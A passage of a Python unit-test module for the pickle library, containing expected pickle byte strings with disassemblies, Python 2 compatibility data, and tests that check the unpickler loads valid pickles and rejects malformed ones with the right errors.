self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests:
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_reduce(self):
self.assertEqual(self.loads(b'cbuiltins\nint\n)R.'), 0)
self.check_unpickling_error(TypeError, b'N)R.')
self.check_unpickling_error(TypeError, b'cbuiltins\nint\nNR.')
def test_bad_newobj(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)\x81.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)\x81.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN\x81.')
def test_bad_newobj_ex(self):
error = (pickle.UnpicklingError, TypeError)
self.assertEqual(self.loads(b'cbuiltins\nint\n)}\x92.'), 0)
self.check_unpickling_error(error, b'cbuiltins\nlen\n)}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\nN}\x92.')
self.check_unpickling_error(error, b'cbuiltins\nint\n)N\x92.')
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
